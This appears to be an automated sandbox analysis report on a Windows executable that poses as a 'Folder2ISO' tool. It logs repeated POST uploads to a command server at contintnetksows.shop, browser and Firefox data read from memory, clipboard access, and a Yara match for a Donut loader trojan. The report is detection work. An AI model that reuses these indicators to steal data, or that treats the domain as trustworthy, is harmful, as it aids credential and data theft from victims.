              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7081Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1261Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586400Host: contintnetksows.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: contintnetksows.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: contintnetksows.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: contintnetksows.shop
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://ocsps.ssl.com0
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://ocsps.ssl.com0?
              Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
              Source: 6RVmzn1DzL.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/%%
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/a
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/a7
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000002.2398263626.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/api
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/api$
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/api%
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apiT
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apiassw
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apien0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apieppgd
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apih
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apin
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apirofi
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/apiz
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/e
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/p
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/p1
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/pp
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/s
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2185058375.00000000012AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop/s8
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop:443/api
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop:443/api)
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop:443/apiK
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contintnetksows.shop:443/api_storageCJ
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 6RVmzn1DzL.exeString found in binary or memory: https://github.com/imgdrive/Folder2ISO
              Source: 6RVmzn1DzL.exeString found in binary or memory: https://github.com/imgdrive/Folder2ISO/issues
              Source: 6RVmzn1DzL.exeString found in binary or memory: https://github.com/imgdrive/Folder2ISOhttps://github.com/imgdrive/Folder2ISO/issuesVIDEO_TSBDMVBDAVA
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159036382.0000000003C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: 6RVmzn1DzL.exeString found in binary or memory: https://www.ssl.com/repository0
              Source: 6RVmzn1DzL.exeString found in binary or memory: https://www.yubsoft.com
              Source: 6RVmzn1DzL.exeString found in binary or memory: https://www.yubsoft.com%dshell32.dllSHGetDesktopFolderSHCreateShellItem
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031FE780 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,0_2_031FE780
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031FE780 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,0_2_031FE780

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DE0CB6 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_02DE0CB6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00623E410_2_00623E41
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006238690_2_00623869
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006240F90_2_006240F9
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006230B50_2_006230B5
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0062388D0_2_0062388D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0062616B0_2_0062616B
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0062B9360_2_0062B936
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0063E1F60_2_0063E1F6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006231AA0_2_006231AA
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006232220_2_00623222
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006232F00_2_006232F0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006402D60_2_006402D6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006232910_2_00623291
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00624B770_2_00624B77
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00623B5D0_2_00623B5D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0062D3320_2_0062D332
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006233040_2_00623304
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00623B160_2_00623B16
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00623CA30_2_00623CA3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0063DC840_2_0063DC84
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00632C9C0_2_00632C9C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006235700_2_00623570
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006235470_2_00623547
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00623D2B0_2_00623D2B
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006235060_2_00623506
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006235990_2_00623599
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006266450_2_00626645
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006236110_2_00623611
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006326D40_2_006326D4
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0062CF660_2_0062CF66
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0063E7680_2_0063E768
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00639F7E0_2_00639F7E
